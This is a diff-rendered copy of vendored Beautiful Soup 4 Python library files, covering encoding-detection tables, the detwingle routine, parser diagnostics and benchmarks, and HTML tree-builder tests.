        '''Given a string and its encoding, decodes the string into Unicode.
        %encoding is a string recognized by encodings.aliases'''
        return unicode(data, encoding, errors)

    @property
    def declared_html_encoding(self):
        if not self.is_html:
            return None
        return self.detector.declared_encoding

    def find_codec(self, charset):
        value = (self._codec(self.CHARSET_ALIASES.get(charset, charset))
               or (charset and self._codec(charset.replace("-", "")))
               or (charset and self._codec(charset.replace("-", "_")))
               or (charset and charset.lower())
               or charset
                )
        if value:
            return value.lower()
        return None

    def _codec(self, charset):
        if not charset:
            return charset
        codec = None
        try:
            codecs.lookup(charset)
            codec = charset
        except (LookupError, ValueError):
            pass
        return codec


    # A partial mapping of ISO-Latin-1 to HTML entities/XML numeric entities.
    MS_CHARS = {b'\x80': ('euro', '20AC'),
                b'\x81': ' ',
                b'\x82': ('sbquo', '201A'),
                b'\x83': ('fnof', '192'),
                b'\x84': ('bdquo', '201E'),
                b'\x85': ('hellip', '2026'),
                b'\x86': ('dagger', '2020'),
                b'\x87': ('Dagger', '2021'),
                b'\x88': ('circ', '2C6'),
                b'\x89': ('permil', '2030'),
                b'\x8A': ('Scaron', '160'),
                b'\x8B': ('lsaquo', '2039'),
                b'\x8C': ('OElig', '152'),
                b'\x8D': '?',
                b'\x8E': ('#x17D', '17D'),
                b'\x8F': '?',
                b'\x90': '?',
                b'\x91': ('lsquo', '2018'),
                b'\x92': ('rsquo', '2019'),
                b'\x93': ('ldquo', '201C'),
                b'\x94': ('rdquo', '201D'),
                b'\x95': ('bull', '2022'),
                b'\x96': ('ndash', '2013'),
                b'\x97': ('mdash', '2014'),
                b'\x98': ('tilde', '2DC'),
                b'\x99': ('trade', '2122'),
                b'\x9a': ('scaron', '161'),
                b'\x9b': ('rsaquo', '203A'),
                b'\x9c': ('oelig', '153'),
                b'\x9d': '?',
                b'\x9e': ('#x17E', '17E'),
                b'\x9f': ('Yuml', ''),}

    # A parochial partial mapping of ISO-Latin-1 to ASCII. Contains
    # horrors like stripping diacritical marks to turn á into a, but also
    # contains non-horrors like turning “ into ".
    MS_CHARS_TO_ASCII = {
        b'\x80' : 'EUR',  b'\x81' : ' ',    b'\x82' : ',',    b'\x83' : 'f',
        b'\x84' : ',,',   b'\x85' : '...',  b'\x86' : '+',    b'\x87' : '++',
        b'\x88' : '^',    b'\x89' : '%',    b'\x8a' : 'S',    b'\x8b' : '<',
        b'\x8c' : 'OE',   b'\x8d' : '?',    b'\x8e' : 'Z',    b'\x8f' : '?',
        b'\x90' : '?',    b'\x91' : "'",    b'\x92' : "'",    b'\x93' : '"',
        b'\x94' : '"',    b'\x95' : '*',    b'\x96' : '-',    b'\x97' : '--',
        b'\x98' : '~',    b'\x99' : '(TM)', b'\x9a' : 's',    b'\x9b' : '>',
        b'\x9c' : 'oe',   b'\x9d' : '?',    b'\x9e' : 'z',    b'\x9f' : 'Y',
        b'\xa0' : ' ',    b'\xa1' : '!',    b'\xa2' : 'c',    b'\xa3' : 'GBP',
        b'\xa4' : '$', #This approximation is especially parochial--this is the
                       #generic currency symbol.
        b'\xa5' : 'YEN',  b'\xa6' : '|',    b'\xa7' : 'S',    b'\xa8' : '..',
        b'\xa9' : '',     b'\xaa' : '(th)', b'\xab' : '<<',   b'\xac' : '!',
        b'\xad' : ' ',    b'\xae' : '(R)',  b'\xaf' : '-',    b'\xb0' : 'o',
        b'\xb1' : '+-',   b'\xb2' : '2',    b'\xb3' : '3',
        b'\xb4' : ("'", 'acute'),
        b'\xb5' : 'u',    b'\xb6' : 'P',    b'\xb7' : '*',    b'\xb8' : ',',
        b'\xb9' : '1',    b'\xba' : '(th)', b'\xbb' : '>>',   b'\xbc' : '1/4',
        b'\xbd' : '1/2',  b'\xbe' : '3/4',  b'\xbf' : '?',    b'\xc0' : 'A',
        b'\xc1' : 'A',    b'\xc2' : 'A',    b'\xc3' : 'A',    b'\xc4' : 'A',
        b'\xc5' : 'A',    b'\xc6' : 'AE',   b'\xc7' : 'C',    b'\xc8' : 'E',
        b'\xc9' : 'E',    b'\xca' : 'E',    b'\xcb' : 'E',    b'\xcc' : 'I',
        b'\xcd' : 'I',    b'\xce' : 'I',    b'\xcf' : 'I',    b'\xd0' : 'D',
        b'\xd1' : 'N',    b'\xd2' : 'O',    b'\xd3' : 'O',    b'\xd4' : 'O',
        b'\xd5' : 'O',    b'\xd6' : 'O',    b'\xd7' : '*',    b'\xd8' : 'O',
        b'\xd9' : 'U',    b'\xda' : 'U',    b'\xdb' : 'U',    b'\xdc' : 'U',
        b'\xdd' : 'Y',    b'\xde' : 'b',    b'\xdf' : 'B',    b'\xe0' : 'a',
        b'\xe1' : 'a',    b'\xe2' : 'a',    b'\xe3' : 'a',    b'\xe4' : 'a',
        b'\xe5' : 'a',    b'\xe6' : 'ae',   b'\xe7' : 'c',    b'\xe8' : 'e',
        b'\xe9' : 'e',    b'\xea' : 'e',    b'\xeb' : 'e',    b'\xec' : 'i',
        b'\xed' : 'i',    b'\xee' : 'i',    b'\xef' : 'i',    b'\xf0' : 'o',
        b'\xf1' : 'n',    b'\xf2' : 'o',    b'\xf3' : 'o',    b'\xf4' : 'o',
        b'\xf5' : 'o',    b'\xf6' : 'o',    b'\xf7' : '/',    b'\xf8' : 'o',
        b'\xf9' : 'u',    b'\xfa' : 'u',    b'\xfb' : 'u',    b'\xfc' : 'u',
        b'\xfd' : 'y',    b'\xfe' : 'b',    b'\xff' : 'y',
        }

    # A map used when removing rogue Windows-1252/ISO-8859-1
    # characters in otherwise UTF-8 documents.
    #
    # Note that \x81, \x8d, \x8f, \x90, and \x9d are undefined in
    # Windows-1252.
    WINDOWS_1252_TO_UTF8 = {
        0x80 : b'\xe2\x82\xac', # €
        0x82 : b'\xe2\x80\x9a', # ‚
        0x83 : b'\xc6\x92',     # ƒ
        0x84 : b'\xe2\x80\x9e', # „
        0x85 : b'\xe2\x80\xa6', # …
        0x86 : b'\xe2\x80\xa0', # †
        0x87 : b'\xe2\x80\xa1', # ‡
        0x88 : b'\xcb\x86',     # ˆ
        0x89 : b'\xe2\x80\xb0', # ‰
        0x8a : b'\xc5\xa0',     # Š
        0x8b : b'\xe2\x80\xb9', # ‹
        0x8c : b'\xc5\x92',     # Œ
        0x8e : b'\xc5\xbd',     # Ž
        0x91 : b'\xe2\x80\x98', # ‘
        0x92 : b'\xe2\x80\x99', # ’
        0x93 : b'\xe2\x80\x9c', # “
        0x94 : b'\xe2\x80\x9d', # ”
        0x95 : b'\xe2\x80\xa2', # •
        0x96 : b'\xe2\x80\x93', # –
        0x97 : b'\xe2\x80\x94', # —
        0x98 : b'\xcb\x9c',     # ˜
        0x99 : b'\xe2\x84\xa2', # ™
        0x9a : b'\xc5\xa1',     # š
        0x9b : b'\xe2\x80\xba', # ›
        0x9c : b'\xc5\x93',     # œ
        0x9e : b'\xc5\xbe',     # ž
        0x9f : b'\xc5\xb8',     # Ÿ
        0xa0 : b'\xc2\xa0',     # (non-breaking space)
        0xa1 : b'\xc2\xa1',     # ¡
        0xa2 : b'\xc2\xa2',     # ¢
        0xa3 : b'\xc2\xa3',     # £
        0xa4 : b'\xc2\xa4',     # ¤
        0xa5 : b'\xc2\xa5',     # ¥
        0xa6 : b'\xc2\xa6',     # ¦
        0xa7 : b'\xc2\xa7',     # §
        0xa8 : b'\xc2\xa8',     # ¨
        0xa9 : b'\xc2\xa9',     # ©
        0xaa : b'\xc2\xaa',     # ª
        0xab : b'\xc2\xab',     # «
        0xac : b'\xc2\xac',     # ¬
        0xad : b'\xc2\xad',     # (soft hyphen)
        0xae : b'\xc2\xae',     # ®
        0xaf : b'\xc2\xaf',     # ¯
        0xb0 : b'\xc2\xb0',     # °
        0xb1 : b'\xc2\xb1',     # ±
        0xb2 : b'\xc2\xb2',     # ²
        0xb3 : b'\xc2\xb3',     # ³
        0xb4 : b'\xc2\xb4',     # ´
        0xb5 : b'\xc2\xb5',     # µ
        0xb6 : b'\xc2\xb6',     # ¶
        0xb7 : b'\xc2\xb7',     # ·
        0xb8 : b'\xc2\xb8',     # ¸
        0xb9 : b'\xc2\xb9',     # ¹
        0xba : b'\xc2\xba',     # º
        0xbb : b'\xc2\xbb',     # »
        0xbc : b'\xc2\xbc',     # ¼
        0xbd : b'\xc2\xbd',     # ½
        0xbe : b'\xc2\xbe',     # ¾
        0xbf : b'\xc2\xbf',     # ¿
        0xc0 : b'\xc3\x80',     # À
        0xc1 : b'\xc3\x81',     # Á
        0xc2 : b'\xc3\x82',     # Â
        0xc3 : b'\xc3\x83',     # Ã
        0xc4 : b'\xc3\x84',     # Ä
        0xc5 : b'\xc3\x85',     # Å
        0xc6 : b'\xc3\x86',     # Æ
        0xc7 : b'\xc3\x87',     # Ç
        0xc8 : b'\xc3\x88',     # È
        0xc9 : b'\xc3\x89',     # É
        0xca : b'\xc3\x8a',     # Ê
        0xcb : b'\xc3\x8b',     # Ë
        0xcc : b'\xc3\x8c',     # Ì
        0xcd : b'\xc3\x8d',     # Í
        0xce : b'\xc3\x8e',     # Î
        0xcf : b'\xc3\x8f',     # Ï
        0xd0 : b'\xc3\x90',     # Ð
        0xd1 : b'\xc3\x91',     # Ñ
        0xd2 : b'\xc3\x92',     # Ò
        0xd3 : b'\xc3\x93',     # Ó
        0xd4 : b'\xc3\x94',     # Ô
        0xd5 : b'\xc3\x95',     # Õ
        0xd6 : b'\xc3\x96',     # Ö
        0xd7 : b'\xc3\x97',     # ×
        0xd8 : b'\xc3\x98',     # Ø
        0xd9 : b'\xc3\x99',     # Ù
        0xda : b'\xc3\x9a',     # Ú
        0xdb : b'\xc3\x9b',     # Û
        0xdc : b'\xc3\x9c',     # Ü
        0xdd : b'\xc3\x9d',     # Ý
        0xde : b'\xc3\x9e',     # Þ
        0xdf : b'\xc3\x9f',     # ß
        0xe0 : b'\xc3\xa0',     # à
        0xe1 : b'\xc3\xa1',     # á
        0xe2 : b'\xc3\xa2',     # â
        0xe3 : b'\xc3\xa3',     # ã
        0xe4 : b'\xc3\xa4',     # ä
        0xe5 : b'\xc3\xa5',     # å
        0xe6 : b'\xc3\xa6',     # æ
        0xe7 : b'\xc3\xa7',     # ç
        0xe8 : b'\xc3\xa8',     # è
        0xe9 : b'\xc3\xa9',     # é
        0xea : b'\xc3\xaa',     # ê
        0xeb : b'\xc3\xab',     # ë
        0xec : b'\xc3\xac',     # ì
        0xed : b'\xc3\xad',     # í
        0xee : b'\xc3\xae',     # î
        0xef : b'\xc3\xaf',     # ï
        0xf0 : b'\xc3\xb0',     # ð
        0xf1 : b'\xc3\xb1',     # ñ
        0xf2 : b'\xc3\xb2',     # ò
        0xf3 : b'\xc3\xb3',     # ó
        0xf4 : b'\xc3\xb4',     # ô
        0xf5 : b'\xc3\xb5',     # õ
        0xf6 : b'\xc3\xb6',     # ö
        0xf7 : b'\xc3\xb7',     # ÷
        0xf8 : b'\xc3\xb8',     # ø
        0xf9 : b'\xc3\xb9',     # ù
        0xfa : b'\xc3\xba',     # ú
        0xfb : b'\xc3\xbb',     # û
        0xfc : b'\xc3\xbc',     # ü
        0xfd : b'\xc3\xbd',     # ý
        0xfe : b'\xc3\xbe',     # þ
        }

    MULTIBYTE_MARKERS_AND_SIZES = [
        (0xc2, 0xdf, 2), # 2-byte characters start with a byte C2-DF
        (0xe0, 0xef, 3), # 3-byte characters start with E0-EF
        (0xf0, 0xf4, 4), # 4-byte characters start with F0-F4
        ]

    FIRST_MULTIBYTE_MARKER = MULTIBYTE_MARKERS_AND_SIZES[0][0]
    LAST_MULTIBYTE_MARKER = MULTIBYTE_MARKERS_AND_SIZES[-1][1]

    @classmethod
    def detwingle(cls, in_bytes, main_encoding="utf8",
                  embedded_encoding="windows-1252"):
        """Fix characters from one encoding embedded in some other encoding.

        Currently the only situation supported is Windows-1252 (or its
        subset ISO-8859-1), embedded in UTF-8.

        The input must be a bytestring. If you've already converted
        the document to Unicode, you're too late.

        The output is a bytestring in which `embedded_encoding`
        characters have been converted to their `main_encoding`
        equivalents.
        """
        if embedded_encoding.replace('_', '-').lower() not in (
            'windows-1252', 'windows_1252'):
            raise NotImplementedError(
                "Windows-1252 and ISO-8859-1 are the only currently supported "
                "embedded encodings.")

        if main_encoding.lower() not in ('utf8', 'utf-8'):
            raise NotImplementedError(
                "UTF-8 is the only currently supported main encoding.")

        byte_chunks = []

        chunk_start = 0
        pos = 0
        while pos < len(in_bytes):
            byte = in_bytes[pos]
            if not isinstance(byte, int):
                # Python 2.x
                byte = ord(byte)
            if (byte >= cls.FIRST_MULTIBYTE_MARKER
                and byte <= cls.LAST_MULTIBYTE_MARKER):
                # This is the start of a UTF-8 multibyte character. Skip
                # to the end.
                for start, end, size in cls.MULTIBYTE_MARKERS_AND_SIZES:
                    if byte >= start and byte <= end:
                        pos += size
                        break
            elif byte >= 0x80 and byte in cls.WINDOWS_1252_TO_UTF8:
                # We found a Windows-1252 character!
                # Save the string up to this point as a chunk.
                byte_chunks.append(in_bytes[chunk_start:pos])

                # Now translate the Windows-1252 character into UTF-8
                # and add it as another, one-byte chunk.
                byte_chunks.append(cls.WINDOWS_1252_TO_UTF8[byte])
                pos += 1
                chunk_start = pos
            else:
                # Go on to the next character.
                pos += 1
        if chunk_start == 0:
            # The string is unchanged.
            return in_bytes
        else:
            # Store the final chunk.
            byte_chunks.append(in_bytes[chunk_start:])
        return b''.join(byte_chunks)
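A minimal, illustrative use of the two entry points above (not part of the shipped file): UnicodeDammit decodes a bytestring of unknown encoding, and detwingle() repairs Windows-1252 bytes pasted into a UTF-8 document.

# Illustrative sketch only (UnicodeDammit is re-exported by bs4's top level).
from bs4 import UnicodeDammit

dammit = UnicodeDammit(b"Sacr\xe9 bleu!")
print dammit.original_encoding   # whatever the detector settled on
print dammit.unicode_markup

doc = u"\N{SNOWMAN}".encode("utf8") + b"\x93Hi!\x94"
print UnicodeDammit.detwingle(doc).decode("utf8")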
213
PortalAuth/includes/scripts/libs/bs4/diagnose.py
Executable file
@@ -0,0 +1,213 @@
"""Diagnostic functions, mainly for use when doing tech support."""
|
||||
import cProfile
|
||||
from StringIO import StringIO
|
||||
from HTMLParser import HTMLParser
|
||||
import bs4
|
||||
from bs4 import BeautifulSoup, __version__
|
||||
from bs4.builder import builder_registry
|
||||
|
||||
import os
|
||||
import pstats
|
||||
import random
|
||||
import tempfile
|
||||
import time
|
||||
import traceback
|
||||
import sys
|
||||
import cProfile
|
||||
|
||||
def diagnose(data):
|
||||
"""Diagnostic suite for isolating common problems."""
|
||||
print "Diagnostic running on Beautiful Soup %s" % __version__
|
||||
print "Python version %s" % sys.version
|
||||
|
||||
basic_parsers = ["html.parser", "html5lib", "lxml"]
|
||||
for name in basic_parsers:
|
||||
for builder in builder_registry.builders:
|
||||
if name in builder.features:
|
||||
break
|
||||
else:
|
||||
basic_parsers.remove(name)
|
||||
print (
|
||||
"I noticed that %s is not installed. Installing it may help." %
|
||||
name)
|
||||
|
||||
if 'lxml' in basic_parsers:
|
||||
basic_parsers.append(["lxml", "xml"])
|
||||
try:
|
||||
from lxml import etree
|
||||
print "Found lxml version %s" % ".".join(map(str,etree.LXML_VERSION))
|
||||
except ImportError, e:
|
||||
print (
|
||||
"lxml is not installed or couldn't be imported.")
|
||||
|
||||
|
||||
if 'html5lib' in basic_parsers:
|
||||
try:
|
||||
import html5lib
|
||||
print "Found html5lib version %s" % html5lib.__version__
|
||||
except ImportError, e:
|
||||
print (
|
||||
"html5lib is not installed or couldn't be imported.")
|
||||
|
||||
if hasattr(data, 'read'):
|
||||
data = data.read()
|
||||
elif os.path.exists(data):
|
||||
print '"%s" looks like a filename. Reading data from the file.' % data
|
||||
data = open(data).read()
|
||||
elif data.startswith("http:") or data.startswith("https:"):
|
||||
print '"%s" looks like a URL. Beautiful Soup is not an HTTP client.' % data
|
||||
print "You need to use some other library to get the document behind the URL, and feed that document to Beautiful Soup."
|
||||
return
|
||||
print
|
||||
|
||||
for parser in basic_parsers:
|
||||
print "Trying to parse your markup with %s" % parser
|
||||
success = False
|
||||
try:
|
||||
soup = BeautifulSoup(data, parser)
|
||||
success = True
|
||||
except Exception, e:
|
||||
print "%s could not parse the markup." % parser
|
||||
traceback.print_exc()
|
||||
if success:
|
||||
print "Here's what %s did with the markup:" % parser
|
||||
print soup.prettify()
|
||||
|
||||
print "-" * 80
|
||||
|
||||
def lxml_trace(data, html=True, **kwargs):
|
||||
"""Print out the lxml events that occur during parsing.
|
||||
|
||||
This lets you see how lxml parses a document when no Beautiful
|
||||
Soup code is running.
|
||||
"""
|
||||
from lxml import etree
|
||||
for event, element in etree.iterparse(StringIO(data), html=html, **kwargs):
|
||||
print("%s, %4s, %s" % (event, element.tag, element.text))
|
||||
|
||||
class AnnouncingParser(HTMLParser):
|
||||
"""Announces HTMLParser parse events, without doing anything else."""
|
||||
|
||||
def _p(self, s):
|
||||
print(s)
|
||||
|
||||
def handle_starttag(self, name, attrs):
|
||||
self._p("%s START" % name)
|
||||
|
||||
def handle_endtag(self, name):
|
||||
self._p("%s END" % name)
|
||||
|
||||
def handle_data(self, data):
|
||||
self._p("%s DATA" % data)
|
||||
|
||||
def handle_charref(self, name):
|
||||
self._p("%s CHARREF" % name)
|
||||
|
||||
def handle_entityref(self, name):
|
||||
self._p("%s ENTITYREF" % name)
|
||||
|
||||
def handle_comment(self, data):
|
||||
self._p("%s COMMENT" % data)
|
||||
|
||||
def handle_decl(self, data):
|
||||
self._p("%s DECL" % data)
|
||||
|
||||
def unknown_decl(self, data):
|
||||
self._p("%s UNKNOWN-DECL" % data)
|
||||
|
||||
def handle_pi(self, data):
|
||||
self._p("%s PI" % data)
|
||||
|
||||
def htmlparser_trace(data):
|
||||
"""Print out the HTMLParser events that occur during parsing.
|
||||
|
||||
This lets you see how HTMLParser parses a document when no
|
||||
Beautiful Soup code is running.
|
||||
"""
|
||||
parser = AnnouncingParser()
|
||||
parser.feed(data)
|
||||
|
||||
_vowels = "aeiou"
|
||||
_consonants = "bcdfghjklmnpqrstvwxyz"
|
||||
|
||||
def rword(length=5):
|
||||
"Generate a random word-like string."
|
||||
s = ''
|
||||
for i in range(length):
|
||||
if i % 2 == 0:
|
||||
t = _consonants
|
||||
else:
|
||||
t = _vowels
|
||||
s += random.choice(t)
|
||||
return s
|
||||
|
||||
def rsentence(length=4):
|
||||
"Generate a random sentence-like string."
|
||||
return " ".join(rword(random.randint(4,9)) for i in range(length))
|
||||
|
||||
def rdoc(num_elements=1000):
|
||||
"""Randomly generate an invalid HTML document."""
|
||||
tag_names = ['p', 'div', 'span', 'i', 'b', 'script', 'table']
|
||||
elements = []
|
||||
for i in range(num_elements):
|
||||
choice = random.randint(0,3)
|
||||
if choice == 0:
|
||||
# New tag.
|
||||
tag_name = random.choice(tag_names)
|
||||
elements.append("<%s>" % tag_name)
|
||||
elif choice == 1:
|
||||
elements.append(rsentence(random.randint(1,4)))
|
||||
elif choice == 2:
|
||||
# Close a tag.
|
||||
tag_name = random.choice(tag_names)
|
||||
elements.append("</%s>" % tag_name)
|
||||
return "<html>" + "\n".join(elements) + "</html>"
|
||||
|
||||
def benchmark_parsers(num_elements=100000):
|
||||
"""Very basic head-to-head performance benchmark."""
|
||||
print "Comparative parser benchmark on Beautiful Soup %s" % __version__
|
||||
data = rdoc(num_elements)
|
||||
print "Generated a large invalid HTML document (%d bytes)." % len(data)
|
||||
|
||||
for parser in ["lxml", ["lxml", "html"], "html5lib", "html.parser"]:
|
||||
success = False
|
||||
try:
|
||||
a = time.time()
|
||||
soup = BeautifulSoup(data, parser)
|
||||
b = time.time()
|
||||
success = True
|
||||
except Exception, e:
|
||||
print "%s could not parse the markup." % parser
|
||||
traceback.print_exc()
|
||||
if success:
|
||||
print "BS4+%s parsed the markup in %.2fs." % (parser, b-a)
|
||||
|
||||
from lxml import etree
|
||||
a = time.time()
|
||||
etree.HTML(data)
|
||||
b = time.time()
|
||||
print "Raw lxml parsed the markup in %.2fs." % (b-a)
|
||||
|
||||
import html5lib
|
||||
parser = html5lib.HTMLParser()
|
||||
a = time.time()
|
||||
parser.parse(data)
|
||||
b = time.time()
|
||||
print "Raw html5lib parsed the markup in %.2fs." % (b-a)
|
||||
|
||||
def profile(num_elements=100000, parser="lxml"):
|
||||
|
||||
filehandle = tempfile.NamedTemporaryFile()
|
||||
filename = filehandle.name
|
||||
|
||||
data = rdoc(num_elements)
|
||||
vars = dict(bs4=bs4, data=data, parser=parser)
|
||||
cProfile.runctx('bs4.BeautifulSoup(data, parser)' , vars, vars, filename)
|
||||
|
||||
stats = pstats.Stats(filename)
|
||||
# stats.strip_dirs()
|
||||
stats.sort_stats("cumulative")
|
||||
stats.print_stats('_html5lib|bs4', 50)
|
||||
|
||||
if __name__ == '__main__':
|
||||
diagnose(sys.stdin.read())
|
||||
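A minimal, illustrative call (not part of the shipped file): diagnose() accepts the markup itself, a readable file object, or a filename, and reports which installed parsers can handle it.

# Illustrative sketch only.
from bs4.diagnose import diagnose
diagnose("<p>Some <b>questionable<>markup")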
1713
PortalAuth/includes/scripts/libs/bs4/element.py
Executable file
File diff suppressed because it is too large
680
PortalAuth/includes/scripts/libs/bs4/testing.py
Executable file
@@ -0,0 +1,680 @@
"""Helper classes for tests."""
|
||||
|
||||
import pickle
|
||||
import copy
|
||||
import functools
|
||||
import unittest
|
||||
from unittest import TestCase
|
||||
from bs4 import BeautifulSoup
|
||||
from bs4.element import (
|
||||
CharsetMetaAttributeValue,
|
||||
Comment,
|
||||
ContentMetaAttributeValue,
|
||||
Doctype,
|
||||
SoupStrainer,
|
||||
)
|
||||
|
||||
from bs4.builder import HTMLParserTreeBuilder
|
||||
default_builder = HTMLParserTreeBuilder
|
||||
|
||||
|
||||
class SoupTest(unittest.TestCase):
|
||||
|
||||
@property
|
||||
def default_builder(self):
|
||||
return default_builder()
|
||||
|
||||
def soup(self, markup, **kwargs):
|
||||
"""Build a Beautiful Soup object from markup."""
|
||||
builder = kwargs.pop('builder', self.default_builder)
|
||||
return BeautifulSoup(markup, builder=builder, **kwargs)
|
||||
|
||||
def document_for(self, markup):
|
||||
"""Turn an HTML fragment into a document.
|
||||
|
||||
The details depend on the builder.
|
||||
"""
|
||||
return self.default_builder.test_fragment_to_document(markup)
|
||||
|
||||
def assertSoupEquals(self, to_parse, compare_parsed_to=None):
|
||||
builder = self.default_builder
|
||||
obj = BeautifulSoup(to_parse, builder=builder)
|
||||
if compare_parsed_to is None:
|
||||
compare_parsed_to = to_parse
|
||||
|
||||
self.assertEqual(obj.decode(), self.document_for(compare_parsed_to))
|
||||
|
||||
def assertConnectedness(self, element):
|
||||
"""Ensure that next_element and previous_element are properly
|
||||
set for all descendants of the given element.
|
||||
"""
|
||||
earlier = None
|
||||
for e in element.descendants:
|
||||
if earlier:
|
||||
self.assertEqual(e, earlier.next_element)
|
||||
self.assertEqual(earlier, e.previous_element)
|
||||
earlier = e


class HTMLTreeBuilderSmokeTest(object):

    """A basic test of a treebuilder's competence.

    Any HTML treebuilder, present or future, should be able to pass
    these tests. With invalid markup, there's room for interpretation,
    and different parsers can handle it differently. But with the
    markup in these tests, there's not much room for interpretation.
    """

    def test_pickle_and_unpickle_identity(self):
        # Pickling a tree, then unpickling it, yields a tree identical
        # to the original.
        tree = self.soup("<a><b>foo</a>")
        dumped = pickle.dumps(tree, 2)
        loaded = pickle.loads(dumped)
        self.assertEqual(loaded.__class__, BeautifulSoup)
        self.assertEqual(loaded.decode(), tree.decode())

    def assertDoctypeHandled(self, doctype_fragment):
        """Assert that a given doctype string is handled correctly."""
        doctype_str, soup = self._document_with_doctype(doctype_fragment)

        # Make sure a Doctype object was created.
        doctype = soup.contents[0]
        self.assertEqual(doctype.__class__, Doctype)
        self.assertEqual(doctype, doctype_fragment)
        self.assertEqual(str(soup)[:len(doctype_str)], doctype_str)

        # Make sure that the doctype was correctly associated with the
        # parse tree and that the rest of the document parsed.
        self.assertEqual(soup.p.contents[0], 'foo')

    def _document_with_doctype(self, doctype_fragment):
        """Generate and parse a document with the given doctype."""
        doctype = '<!DOCTYPE %s>' % doctype_fragment
        markup = doctype + '\n<p>foo</p>'
        soup = self.soup(markup)
        return doctype, soup

    def test_normal_doctypes(self):
        """Make sure normal, everyday HTML doctypes are handled correctly."""
        self.assertDoctypeHandled("html")
        self.assertDoctypeHandled(
            'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"')

    def test_empty_doctype(self):
        soup = self.soup("<!DOCTYPE>")
        doctype = soup.contents[0]
        self.assertEqual("", doctype.strip())

    def test_public_doctype_with_url(self):
        doctype = 'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"'
        self.assertDoctypeHandled(doctype)

    def test_system_doctype(self):
        self.assertDoctypeHandled('foo SYSTEM "http://www.example.com/"')

    def test_namespaced_system_doctype(self):
        # We can handle a namespaced doctype with a system ID.
        self.assertDoctypeHandled('xsl:stylesheet SYSTEM "htmlent.dtd"')

    def test_namespaced_public_doctype(self):
        # Test a namespaced doctype with a public id.
        self.assertDoctypeHandled('xsl:stylesheet PUBLIC "htmlent.dtd"')

    def test_real_xhtml_document(self):
        """A real XHTML document should come out more or less the same as it went in."""
        markup = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Hello.</title></head>
<body>Goodbye.</body>
</html>"""
        soup = self.soup(markup)
        self.assertEqual(
            soup.encode("utf-8").replace(b"\n", b""),
            markup.replace(b"\n", b""))

    def test_processing_instruction(self):
        markup = b"""<?PITarget PIContent?>"""
        soup = self.soup(markup)
        self.assertEqual(markup, soup.encode("utf8"))

    def test_deepcopy(self):
        """Make sure you can copy the tree builder.

        This is important because the builder is part of a
        BeautifulSoup object, and we want to be able to copy that.
        """
        copy.deepcopy(self.default_builder)

    def test_p_tag_is_never_empty_element(self):
        """A <p> tag is never designated as an empty-element tag.

        Even if the markup shows it as an empty-element tag, it
        shouldn't be presented that way.
        """
        soup = self.soup("<p/>")
        self.assertFalse(soup.p.is_empty_element)
        self.assertEqual(str(soup.p), "<p></p>")

    def test_unclosed_tags_get_closed(self):
        """A tag that's not closed by the end of the document should be closed.

        This applies to all tags except empty-element tags.
        """
        self.assertSoupEquals("<p>", "<p></p>")
        self.assertSoupEquals("<b>", "<b></b>")

        self.assertSoupEquals("<br>", "<br/>")

    def test_br_is_always_empty_element_tag(self):
        """A <br> tag is designated as an empty-element tag.

        Some parsers treat <br></br> as one <br/> tag, some parsers as
        two tags, but it should always be an empty-element tag.
        """
        soup = self.soup("<br></br>")
        self.assertTrue(soup.br.is_empty_element)
        self.assertEqual(str(soup.br), "<br/>")

    def test_nested_formatting_elements(self):
        self.assertSoupEquals("<em><em></em></em>")

    def test_double_head(self):
        html = '''<!DOCTYPE html>
<html>
<head>
<title>Ordinary HEAD element test</title>
</head>
<script type="text/javascript">
alert("Help!");
</script>
<body>
Hello, world!
</body>
</html>
'''
        soup = self.soup(html)
        self.assertEqual("text/javascript", soup.find('script')['type'])

    def test_comment(self):
        # Comments are represented as Comment objects.
        markup = "<p>foo<!--foobar-->baz</p>"
        self.assertSoupEquals(markup)

        soup = self.soup(markup)
        comment = soup.find(text="foobar")
        self.assertEqual(comment.__class__, Comment)

        # The comment is properly integrated into the tree.
        foo = soup.find(text="foo")
        self.assertEqual(comment, foo.next_element)
        baz = soup.find(text="baz")
        self.assertEqual(comment, baz.previous_element)

    def test_preserved_whitespace_in_pre_and_textarea(self):
        """Whitespace must be preserved in <pre> and <textarea> tags."""
        self.assertSoupEquals("<pre> </pre>")
        self.assertSoupEquals("<textarea> woo </textarea>")

    def test_nested_inline_elements(self):
        """Inline elements can be nested indefinitely."""
        b_tag = "<b>Inside a B tag</b>"
        self.assertSoupEquals(b_tag)

        nested_b_tag = "<p>A <i>nested <b>tag</b></i></p>"
        self.assertSoupEquals(nested_b_tag)

        double_nested_b_tag = "<p>A <a>doubly <i>nested <b>tag</b></i></a></p>"
        self.assertSoupEquals(double_nested_b_tag)

    def test_nested_block_level_elements(self):
        """Block elements can be nested."""
        soup = self.soup('<blockquote><p><b>Foo</b></p></blockquote>')
        blockquote = soup.blockquote
        self.assertEqual(blockquote.p.b.string, 'Foo')
        self.assertEqual(blockquote.b.string, 'Foo')

    def test_correctly_nested_tables(self):
        """One table can go inside another one."""
        markup = ('<table id="1">'
                  '<tr>'
                  "<td>Here's another table:"
                  '<table id="2">'
                  '<tr><td>foo</td></tr>'
                  '</table></td>')

        self.assertSoupEquals(
            markup,
            '<table id="1"><tr><td>Here\'s another table:'
            '<table id="2"><tr><td>foo</td></tr></table>'
            '</td></tr></table>')

        self.assertSoupEquals(
            "<table><thead><tr><td>Foo</td></tr></thead>"
            "<tbody><tr><td>Bar</td></tr></tbody>"
            "<tfoot><tr><td>Baz</td></tr></tfoot></table>")

    def test_deeply_nested_multivalued_attribute(self):
        # html5lib can set the attributes of the same tag many times
        # as it rearranges the tree. This has caused problems with
        # multivalued attributes.
        markup = '<table><div><div class="css"></div></div></table>'
        soup = self.soup(markup)
        self.assertEqual(["css"], soup.div.div['class'])

    def test_multivalued_attribute_on_html(self):
        # html5lib uses a different API to set the attributes of the
        # <html> tag. This has caused problems with multivalued
        # attributes.
        markup = '<html class="a b"></html>'
        soup = self.soup(markup)
        self.assertEqual(["a", "b"], soup.html['class'])

    def test_angle_brackets_in_attribute_values_are_escaped(self):
        self.assertSoupEquals('<a b="<a>"></a>', '<a b="&lt;a&gt;"></a>')

    def test_entities_in_attributes_converted_to_unicode(self):
        expect = u'<p id="pi\N{LATIN SMALL LETTER N WITH TILDE}ata"></p>'
        self.assertSoupEquals('<p id="pi&#241;ata"></p>', expect)
